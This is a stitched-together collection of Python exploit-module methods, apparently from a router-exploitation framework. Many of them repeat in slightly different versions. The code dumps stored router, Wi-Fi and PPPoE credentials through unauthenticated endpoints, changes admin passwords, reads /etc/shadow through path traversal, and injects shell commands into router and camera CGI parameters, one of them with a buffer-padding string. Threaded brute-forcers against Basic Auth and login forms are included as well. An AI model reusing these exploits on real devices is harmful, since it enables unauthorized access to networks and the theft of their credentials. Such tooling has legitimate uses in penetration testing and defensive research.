def check(self):
url = sanitize_url("{}:{}/".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
# unauthorized
if response.status_code == 401:
url = sanitize_url("{}:{}/BRS_netgear_success.html".format(
self.target, self.port))
for _ in range(0, 3):
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
url = sanitize_url("{}:{}/".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
# authorized
if response.status_code == 200:
return True # target is vulnerable
return False # target not vulnerable
def check(self):
url = sanitize_url("{}:{}/".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
# unauthorized
if response.status_code == 401:
url = sanitize_url("{}:{}/BRS_netgear_success.html".format(self.target, self.port))
for _ in range(0, 3):
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
url = sanitize_url("{}:{}/".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
# authorized
if response.status_code == 200:
return True # target is vulnerable
return False # target not vulnerable
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Changing", self.target, "credentials to", self.nuser, ":", self.npass)
url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = {"HttpUserId": self.nuser, "Password": self.npass, "PasswordReEnter": self.npass, "RestoreFactoryNo": "0x00"}
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
print_error("Target did not answer request.")
elif response.status_code == 401:
# Server obeys request but then sends unauthorized response. Here we send a GET request with the new creds.
infotab_url = sanitize_url("{}:{}/RgSwInfo.asp".format(self.target, self.port))
check_response = http_request(method="GET", url=infotab_url, auth=(self.nuser, self.npass))
if check_response.status_code == 200:
print_success("Credentials changed!")
elif response.status_code == 401:
print_error("Target answered, denied access.")
else:
pass
else:
print_error("Unknown error.")
else:
print_error("Exploit failed - Target seems to be not vulnerable")
def check(self):
# check if it is valid target
url = sanitize_url("{}:{}/".format(self.target, self.port))
try:
r = requests.get(url, verify=False)
res = r.text
except:
return None
if '<form name="pagepost" method="post" action="/xslt?PAGE=WRA01_POST&NEXTPAGE=WRA01_POST" id="pagepost">' not in res:
return False
# checking if authentication can be baypassed
url = sanitize_url("{}:{}/xslt".format(self.target, self.port))
try:
r = requests.get(url, verify=False)
res = r.text
except:
return None
if '<form name="pagepost" method="post" action="/xslt?PAGE=WRA01_POST&NEXTPAGE=WRA01_POST" id="pagepost">' not in res:
return True # target vulnerable
return False # target not vulnerable
def run(self):
creds = []
url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
# print_status("Requesting for {}".format(url))
response = http_request(method="GET", url=url)
if response is None:
return
admin = re.findall("pwdAdmin = '(.+?)'", response.text)
if admin:
creds.append(('admin', admin[0]))
support = re.findall("pwdSupport = '(.+?)'", response.text)
if support:
creds.append(('support', support[0]))
user = re.findall("pwdUser = '******'", response.text)
if user:
creds.append(('user', user[0]))
if creds:
print_success("Credentials found!")
print_table(("Login", "Password"), *creds)
else:
print_error("Credentials could not be found")
def attack(self):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
response = http_request("GET", url)
if response is None:
return
if response.status_code != 401:
print_status("Target is not protected by Basic Auth")
return
if self.defaults.startswith('file://'):
defaults = open(self.defaults[7:], 'r')
else:
defaults = [self.defaults]
collection = LockedIterator(defaults)
self.run_threads(self.threads, self.target_function, collection)
if self.credentials:
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
defaults.close()
def run(self):
url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
print_status("Requesting for {}".format(url))
response = http_request(method="GET", url=url)
if response is None:
return
creds = []
admin = re.findall("pwdAdmin = '(.+?)'", response.text)
if len(admin):
creds.append(('Admin', b64decode(admin[0])))
support = re.findall("pwdSupport = '(.+?)'", response.text)
if len(support):
creds.append(('Support', b64decode(support[0])))
user = re.findall("pwdUser = '******'", response.text)
if len(user):
creds.append(('User', b64decode(user[0])))
if len(creds):
print_success("Credentials found!")
headers = ("Login", "Password")
print_table(headers, *creds)
print("NOTE: Admin is commonly implemented as root")
else:
print_error("Credentials could not be found")
def run(self):
# address and parameters
url = sanitize_url("{}:{}/getcfg.php".format(self.target, self.port))
data = {"SERVICES": "DEVICE.ACCOUNT"}
# connection
try:
r = requests.post(url, data=data)
res = r.text
except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
print_error("Invalid URL format: %s" % url)
return
except requests.exceptions.ConnectionError:
print_error("Connection error: %s" % url)
return
# extracting credentials
regular = "<name>(.+?)</name><usrid>(|.+?)</usrid><password>(|.+?)</password>"
creds = re.findall(regular, re.sub('\s+', '', res))
# displaying results
if len(creds):
print_success("Credentials found!")
headers = ('Username', 'Password')
creds = tuple(tuple([item[0], item[2]]) for item in creds)
print_table(headers, *creds)
else:
print_error("Credentials could not be found")
def run(self):
url = sanitize_url("{}:{}/SaveCfgFile.cgi".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return
var = ['pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd']
data = []
for v in var:
regexp = '{}="(.+?)"'.format(v)
val = re.findall(regexp, response.text)
if len(val):
data.append((v, val[0]))
if len(data):
print_success("Exploit success")
headers = ("Option", "Value")
print_table(headers, *data)
else:
print_error("Exploit failed")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Changing", self.target, "credentials to", self.nuser,
":", self.npass)
url = sanitize_url("{}:{}/goform/RgSecurity".format(
self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = {
"HttpUserId": self.nuser,
"Password": self.npass,
"PasswordReEnter": self.npass,
"RestoreFactoryNo": "0x00"
}
response = http_request(method="POST",
url=url,
headers=headers,
data=data)
if response is None:
print_error("Target did not answer request")
elif response.status_code == 401:
print_error("Target answered, denied access.")
else:
print_success("Credentials changed")
else:
print_error("Exploit failed - Target seems to be not vulnerable")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
user, password = data.next()
user = user.encode('utf-8').strip()
password = password.encode('utf-8').strip()
r = requests.get(url, auth=(user, password), verify=False)
if r.status_code != 401:
running.clear()
print_success("{}: Authentication succeed!".format(name),
user,
password,
verbose=module_verbosity)
self.credentials.append((user, password))
else:
print_error(
name,
"Authentication Failed - Username: '******' Password: '******'"
.format(user, password),
verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.', verbose=module_verbosity)
def run(self):
self.credentials = []
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
try:
r = requests.get(url, verify=False)
except (requests.exceptions.MissingSchema,
requests.exceptions.InvalidSchema):
print_error("Invalid URL format: %s" % url)
return
except requests.exceptions.ConnectionError:
print_error("Connection error: %s" % url)
return
if r.status_code != 401:
print_status("Target is not protected by Basic Auth")
return
if self.defaults.startswith('file://'):
defaults = open(self.defaults[7:], 'r')
else:
defaults = [self.defaults]
collection = LockedIterator(defaults)
self.run_threads(self.threads, self.target_function, collection)
if len(self.credentials):
print_success("Credentials found!")
headers = ("Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
def execute(self, cmd):
url = sanitize_url("{}:{}/{}?writeData=true®info=0&macAddress= "
"001122334455 -c 0 ;{}; echo #".format(self.target, self.port, self.valid_resource, cmd))
# blind command injection
response = http_request(method="GET", url=url)
return ""
def run(self):
url = sanitize_url("{}:{}/hidden_info.html".format(self.target, self.port))
try:
r = requests.get(url)
res = r.text
except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
print_error("Invalid URL format: %s" % url)
return
except requests.exceptions.ConnectionError:
print_error("Connection error: %s" % url)
return
creds = []
data = ['2.4G SSID', '2.4G PassPhrase', '5G SSID', '5G PassPhrase', 'PIN Code']
for d in data:
regexp = "<td nowrap><B>{}:</B></td>\r\n\t\t\t<td>(.+?)</td>".format(d)
val = re.findall(regexp, res)
if len(val):
creds.append((d, val[0]))
if len(creds):
print_success("Credentials found!")
headers = ("Option", "Value")
print_table(headers, *creds)
else:
print_error("Credentials could not be found")
def run(self):
url = sanitize_url("{}:{}/SaveCfgFile.cgi".format(
self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return
var = [
'pppoe_username', 'pppoe_password', 'wl0_pskkey', 'wl0_key1',
'mradius_password', 'mradius_secret', 'httpd_password',
'http_passwd', 'pppoe_passwd'
]
data = []
for v in var:
regexp = '{}="(.+?)"'.format(v)
val = re.findall(regexp, response.text)
if len(val):
data.append((v, val[0]))
if len(data):
print_success("Exploit success")
headers = ("Option", "Value")
print_table(headers, *data)
else:
print_error("Exploit failed")
def run(self):
url = sanitize_url(
"{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703"
.format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return
try:
print_status("Decoding JSON")
data = json.loads(response.text)
except ValueError:
print_error("Exploit failed - response is not valid JSON")
return
if len(data):
print_success("Exploit success")
rows = []
for key in data.keys():
if len(data[key]) > 0:
rows.append((key, data[key]))
headers = ("Parameter", "Value")
print_table(headers, *rows)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
user, password = data.next()
user = user.encode('utf-8').strip()
password = password.encode('utf-8').strip()
response = http_request(method="GET", url=url, auth=(user, password))
if response.status_code != 401:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
else:
print_error("Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.', verbose=module_verbosity)
def run(self):
if self.check():
print_success("Target is vulnerable")
url = sanitize_url("{}:{}".format(self.target, self.port))
print "Visit: {}/\n".format(url)
else:
print_error("Target seems to be not vulnerable")
def attack(self):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
response = http_request("GET", url)
if response is None:
return
if response.status_code != 401:
print_status("Target is not protected by Basic Auth")
return
if self.defaults.startswith('file://'):
defaults = open(self.defaults[7:], 'r')
else:
defaults = [self.defaults]
collection = LockedIterator(defaults)
self.run_threads(self.threads, self.target_function, collection)
if self.credentials:
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
defaults.close()
def run(self):
url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
print_status("Requesting for {}".format(url))
response = http_request(method="GET", url=url)
if response is None:
return
creds = []
admin = re.findall("pwdAdmin = '(.+?)'", response.text)
if len(admin):
creds.append(('Admin', b64decode(admin[0])))
support = re.findall("pwdSupport = '(.+?)'", response.text)
if len(support):
creds.append(('Support', b64decode(support[0])))
user = re.findall("pwdUser = '******'", response.text)
if len(user):
creds.append(('User', b64decode(user[0])))
if len(creds):
print_success("Credentials found!")
headers = ("Login", "Password")
print_table(headers, *creds)
print("NOTE: Admin is commonly implemented as root")
else:
print_error("Credentials could not be found")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
line = data.next().split(":")
user = line[0].strip()
password = line[1].strip()
postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password)
r = requests.post(url, headers=headers, data=postdata, verify=False)
l = len(r.text)
if l < self.invalid["min"] or l > self.invalid["max"]:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
else:
print_error("Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.', verbose=module_verbosity)
def detect_form(self):
url = sanitize_url("{}:{}{}".format(self.target, self.port,
self.get_form_path()))
r = requests.get(url, verify=False)
soup = BeautifulSoup(r.text, "lxml")
form = soup.find("form")
if form is None:
return None
action = form.attrs.get('action', None)
if len(form) > 0:
res = []
for inp in form.findAll("input"):
if 'name' in inp.attrs.keys():
if inp.attrs['name'].lower() in [
"username", "user", "login", "username_login"
]:
res.append(inp.attrs['name'] + "=" + "{{USER}}")
elif inp.attrs['name'].lower() in [
"password", "pass", "password_login"
]:
res.append(inp.attrs['name'] + "=" + "{{PASS}}")
else:
if 'value' in inp.attrs.keys():
res.append(inp.attrs['name'] + "=" +
inp.attrs['value'])
else:
res.append(inp.attrs['name'] + "=")
return (action, '&'.join(res))
def execute(self, cmd):
url = sanitize_url("{}:{}/{}?writeData=true®info=0&macAddress= "
"001122334455 -c 0 ;{}; echo #".format(self.target, self.port, self.valid_resource, cmd))
# blind command injection
response = http_request(method="GET", url=url)
return ""
def check(self):
# address and parameters
url = sanitize_url("{}:{}/cgi-bin/webproc".format(
self.target, self.port))
data = {
"getpage": "html/index.html",
"*errorpage*": "../../../../../../../../../../../etc/shadow",
"var%3Amenu": "setup",
"var%3Apage": "connected",
"var%": "",
"objaction": "auth",
"%3Ausername": "******",
"%3Apassword": "******",
"%3Aaction": "login",
"%3Asessionid": "abcdefgh"
}
# connection
response = http_request(method="POST", url=url, data=data)
if response is None:
return False # target is not vulnerable
if "root" in response.text:
return True # target vulnerable
return False # target not vulnerable
def run(self):
url = sanitize_url("{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703".format(self.target, self.port))
print_status("Running module...")
try:
r = requests.get(url)
res = r.text
except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
print_error("Invalid URL format: %s" % url)
return
except requests.exceptions.ConnectionError:
print_error("Connection error: %s" % url)
return
try:
data = json.loads(res)
print_status("Decoding JSON value")
except ValueError:
print_error("Response is not valid JSON")
return
if len(data):
print_success("Exploit success")
rows = []
for key in data.keys():
if len(data[key]) > 0:
rows.append((key, data[key]))
headers = ("Parameter", "Value")
print_table(headers, *rows)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
line = data.next().split(":")
user = line[0].encode('utf-8').strip()
password = line[1].encode('utf-8').strip()
response = http_request(method="GET",
url=url,
auth=(user, password))
if response.status_code != 401:
running.clear()
print_success(
"Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user, password),
verbose=module_verbosity)
self.credentials.append(
(self.target, self.port, user, password))
else:
print_error(
"Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user, password),
verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.', verbose=module_verbosity)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
line = data.next().split(":")
user = line[0].strip()
password = line[1].strip()
postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password)
r = requests.post(url, headers=headers, data=postdata, verify=False)
l = len(r.text)
if l < self.invalid["min"] or l > self.invalid["max"]:
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
else:
print_error(name, "Authentication Failed - Username: '******' Password: '******'".format(user, password), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.', verbose=module_verbosity)
def run(self):
creds = []
url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
# print_status("Requesting for {}".format(url))
response = http_request(method="GET", url=url)
if response is None:
return
admin = re.findall("pwdAdmin = '(.+?)'", response.text)
if admin:
creds.append(('admin', admin[0]))
support = re.findall("pwdSupport = '(.+?)'", response.text)
if support:
creds.append(('support', support[0]))
user = re.findall("pwdUser = '******'", response.text)
if user:
creds.append(('user', user[0]))
if creds:
print_success("Credentials found!")
print_table(("Login", "Password"), *creds)
else:
print_error("Credentials could not be found")
def check(self):
number = int(random_text(6, alph=string.digits))
solution = number - 1
cmd = "echo $(({}-1))".format(number)
marker = random_text(32)
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
for payload in self.payloads:
injection = payload.replace("{{marker}}",
marker).replace("{{cmd}}", cmd)
headers = {
self.header: injection,
}
response = http_request(method=self.method,
url=url,
headers=headers)
if response is None:
continue
if str(solution) in response.text:
self.valid = payload
return True # target is vulnerable
return False # target not vulnerable
def check(self):
url = sanitize_url("{}:{}/test".format(self.target, self.port))
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
headers = {
'User-Agent': user_agent,
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Cache-Control': 'no-cache',
'Cookie': 'C107373883=/omg1337hax'
}
response = http_request(method="GET", url=url, headers=headers)
if response is None:
return False # target is not vulnerable
if response.status_code != 404:
return False # not rompage
else:
if 'server' in response.headers:
server = response.headers.get('server')
if re.search('RomPager', server) is not None:
if re.search('omg1337hax', response.text) is not None:
return True # device is vulnerable
else:
return None # could not verify
return False # target is not vulnerable
def check(self):
mark = random_text(32)
cmd = "echo {}".format(mark)
url = sanitize_url("{}:{}/apply.cgi".format(self.target, self.port))
data = {
"submit_button": "Diagnostics",
"change_action": "gozila_cgi",
"submit_type": "start_ping",
"action": "",
"commit": "0",
"ping_ip": "127.0.0.1",
"ping_size": "&" + cmd,
"ping_times": "5",
"traceroute_ip": "127.0.0.1"
}
response = http_request(method="POST",
url=url,
data=data,
auth=(self.username, self.password))
if response is None:
return False # target is not vulnerable
if mark in response.text:
return True # target is vulnerable
return False # target is not vulnerable
def run(self):
url = sanitize_url("{}:{}/hidden_info.html".format(
self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return
creds = []
data = [
'2.4G SSID', '2.4G PassPhrase', '5G SSID', '5G PassPhrase',
'PIN Code'
]
for d in data:
regexp = "<td nowrap><B>{}:</B></td>\r\n\t\t\t<td>(.+?)</td>".format(
d)
val = re.findall(regexp, response.text)
if len(val):
creds.append((d, val[0]))
if len(creds):
print_success("Credentials found!")
headers = ("Option", "Value")
print_table(headers, *creds)
else:
print_error("Credentials could not be found")
def check(self):
url = sanitize_url("{}:{}/test".format(self.target, self.port))
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Cache-Control': 'no-cache',
'Cookie': 'C107373883=/omg1337hax'}
response = http_request(method="GET", url=url, headers=headers)
if response is None:
return False # target is not vulnerable
if response.status_code != 404:
return False # not rompage
else:
if 'server' in response.headers:
server = response.headers.get('server')
if re.search('RomPager', server) is not None:
if re.search('omg1337hax', response.text) is not None:
return True # device is vulnerable
else:
return None # could not verify
return False # target is not vulnerable
def attack(self):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
response = http_request(method="GET", url=url)
if response is None:
return
if response.status_code != 401:
print_status("Target is not protected by Basic Auth")
return
if self.usernames.startswith('file://'):
usernames = open(self.usernames[7:], 'r')
else:
usernames = [self.usernames]
if self.passwords.startswith('file://'):
passwords = open(self.passwords[7:], 'r')
else:
passwords = [self.passwords]
collection = LockedIterator(itertools.product(usernames, passwords))
self.run_threads(self.threads, self.target_function, collection)
if len(self.credentials):
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
def attack(self):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
response = http_request(method="GET", url=url)
if response is None:
return
if response.status_code != 401:
print_status("Target is not protected by Basic Auth")
return
if self.usernames.startswith('file://'):
usernames = open(self.usernames[7:], 'r')
else:
usernames = [self.usernames]
if self.passwords.startswith('file://'):
passwords = open(self.passwords[7:], 'r')
else:
passwords = [self.passwords]
collection = LockedIterator(itertools.product(usernames, passwords))
self.run_threads(self.threads, self.target_function, collection)
if len(self.credentials):
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
def check(self):
url = sanitize_url("{}:{}/".format(self.target, self.port))
try:
r = requests.get(url)
except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema, requests.exceptions.ConnectionError):
return None # target could not be verified
if r.status_code == requests.codes.unauthorized:
url = sanitize_url("{}:{}/BRS_netgear_success.html".format(self.target, self.port))
r = requests.get(url)
if r.status_code == requests.codes.ok:
return True
return False # target not vulnerable
def detect_form(self):
url = sanitize_url("{}:{}{}".format(self.target, self.port,
self.get_form_path()))
r = requests.get(url, verify=False)
soup = BeautifulSoup(r.text, "lxml")
forms = soup.findAll("form")
if forms is None:
return None
res = []
action = None
user_name_list = [
"username", "user", "user_name", "login", "username_login",
"nameinput", "uname", "__auth_user", "txt_user", "txtusername"
]
password_list = [
"password", "pass", "password_login", "pwd", "passwd",
"__auth_pass", "txt_pwd", "txtpwd"
]
found = False
for form in forms:
tmp = []
if not len(form):
continue
action = form.attrs.get('action', None)
if action and not action.startswith("/"):
action = "/" + action
for inp in form.findAll("input"):
attributes = ["name", "id"]
for atr in attributes:
if atr not in inp.attrs.keys():
continue
if inp.attrs[atr].lower(
) in user_name_list and inp.attrs['type'] != "hidden":
found = True
tmp.append(inp.attrs[atr] + "=" + "{{USER}}")
elif inp.attrs[atr].lower(
) in password_list and inp.attrs['type'] != "hidden":
found = True
tmp.append(inp.attrs[atr] + "=" + "{{PASS}}")
else:
if 'value' in inp.attrs.keys():
tmp.append(inp.attrs[atr] + "=" +
inp.attrs['value'])
elif inp.attrs['type'] not in ("submit", "button"):
tmp.append(inp.attrs[atr] + "=")
if found:
res = tmp
res = list(set(res))
return (action, '&'.join(res))
def run(self):
if self.check():
print_success("Target is vulnerable")
url = sanitize_url("{}:{}".format(self.target, self.port))
print "Visit: {}/\n".format(url)
else:
print_error("Target seems to be not vulnerable")
def run(self):
url = sanitize_url("{}:{}/SaveCfgFile.cgi".format(self.target, self.port))
try:
r = requests.get(url, verify=False)
res = r.text
except requests.exceptions.ConnectionError:
print_error("Connection error: %s" % url)
return
var = ['pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd']
data = []
for v in var:
regexp = '{}="(.+?)"'.format(v)
val = re.findall(regexp, res)
if len(val):
data.append((v, val[0]))
if len(data):
print_success("Exploit success")
headers = ("Option", "Value")
print_table(headers, *data)
else:
print_error("Exploit failed")
def run(self):
print_status("Running module...")
self.credentials = []
url = sanitize_url("{}:{}".format(self.target, self.port))
try:
r = requests.get(url)
except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
print_error("Invalid URL format: %s" % url)
return
except requests.exceptions.ConnectionError:
print_error("Connection error: %s" % url)
return
if r.status_code != 401:
print_status("Target is not protected by Basic Auth")
return
if self.defaults.startswith('file://'):
defaults = open(self.defaults[7:], 'r')
else:
defaults = [self.defaults]
collection = LockedIterator(defaults)
self.run_threads(self.threads, self.target_function, collection)
if len(self.credentials):
print_success("Credentials found!")
headers = ("Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
def detect_form(self):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.get_form_path()))
r = requests.get(url, verify=False)
soup = BeautifulSoup(r.text, "lxml")
form = soup.find("form")
if form is None:
return None
action = form.attrs.get('action', None)
if len(form) > 0:
res = []
for inp in form.findAll("input"):
if 'name' in inp.attrs.keys():
if inp.attrs['name'].lower() in ["username", "user", "login", "username_login"]:
res.append(inp.attrs['name'] + "=" + "{{USER}}")
elif inp.attrs['name'].lower() in ["password", "pass", "password_login"]:
res.append(inp.attrs['name'] + "=" + "{{PASS}}")
else:
if 'value' in inp.attrs.keys():
res.append(inp.attrs['name'] + "=" + inp.attrs['value'])
else:
res.append(inp.attrs['name'] + "=")
return (action, '&'.join(res))
def run(self):
if self.check():
url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
print_status("Requesting for {}".format(url))
response = http_request(method="GET", url=url)
if response is None:
return
regexps = [("admin", "pwdAdmin = '(.+?)'"),
("support", "pwdSupport = '(.+?)'"),
("user", "pwdUser = '******'")]
creds = []
for regexp in regexps:
res = re.findall(regexp[1], response.text)
if len(res):
creds.append((regexp[0], b64decode(res[0])))
if len(creds):
print_success("Credentials found!")
headers = ("Login", "Password")
print_table(headers, *creds)
print("NOTE: Admin is commonly implemented as root")
else:
print_error("Credentials could not be found")
else:
print_error("Device seems to be not vulnerable")
def execute(self, cmd):
url = sanitize_url("{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd))
response = http_request(method="GET", url=url)
if response is None:
return ""
return response.text
def check(self):
url = sanitize_url("{}:{}/logo.jpg".format(self.target, self.port))
response = http_request(method="GET", url=url, auth=("", ""))
# print response.text.encode('utf-8')
if response is not None and self.vulnresp in response.text.encode('utf-8'):
return True
else:
return False
def execute(self, cmd):
# Get credentials
print_status("Extracting credentials")
credential_url = sanitize_url(
"{}:{}/system.ini?loginuse&loginpas".format(
self.target, self.port))
response = http_request(method="GET", url=credential_url)
# Find the magic sequence "0000 0a0a 0a0a 01"
magic_sequence_location = response.content.find(
b'\x00\x00\x0a\x0a\x0a\x0a\x01')
# Skip ahead by 144 bytes to the beginning of username
username_location = magic_sequence_location + 144
# Read every byte in a loop until the first '\x00'
# THIS WILL NOT WORK UNDER PYTHON 3 (bytearrays return ints in py3)!
username_bytes = bytearray()
next_username_byte = bytes()
index = username_location
while next_username_byte != b'\x00':
username_bytes.append(response.content[index])
next_username_byte = response.content[index + 1]
index = index + 1
username = username_bytes.decode('utf-8')
print_info("Username: "******"Password: "******"{}:{}/set_ftp.cgi?next_url=ftp.htm&loginuse={}&loginpas={}&svr=192.168.1.1&port=21&user=ftp&pwd=$({})&dir=/&mode=PORT&upload_interval=0".format(
self.target, self.port, username, password, cmd)
http_request(method="GET", url=command_url)
# Run command
run_url = "{}:{}/ftptest.cgi?next_url=test_ftp.htm&loginuse={}&loginpas={}".format(
self.target, self.port, username, password)
http_request(method="GET", url=run_url)
time.sleep(2)
return ""
def check(self):
url = sanitize_url("{}:{}/system.ini?loginuse&loginpas".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False
if response.status_code == 200 and b'\x00\x00\x0a\x0a\x0a\x0a\x01' in response.content:
return True
else:
return False
def check(self):
url = sanitize_url("{}:{}/logo.jpg".format(self.target, self.port))
response = http_request(method="GET", url=url, auth=("", ""))
# print response.text.encode('utf-8')
if response is not None and self.vulnresp in response.text.encode(
'utf-8'):
return True
else:
return False
def execute(self, cmd):
url = sanitize_url("{}:{}/login.cgi.php".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = "GO=&jump=" + "A" * 1379 + ";{};&ps=\n\n".format(cmd)
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
return ""
return response.text
def execute(self, cmd):
url = sanitize_url("{}:{}/login.cgi.php".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = "GO=&jump=" + "A" * 1379 + ";{};&ps=\n\n".format(cmd)
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
return ""
return response.text
def execute(self, cmd):
url = sanitize_url("{}:{}/command.php".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = "cmd={}".format(cmd)
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
return ""
return response.text.strip()
def check(self):
url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if any(map(lambda x: x in response.text, ["pwdSupport", "pwdUser", "pwdAdmin"])):
return True # target vulnerable
return False # target not vulnerable
def execute(self, cmd):
url = sanitize_url("{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd))
try:
r = requests.get(url)
except requests.exceptions.MissingSchema:
return "Invalid URL format: %s" % url
except requests.exceptions.ConnectionError:
return "Connection error: %s" % url
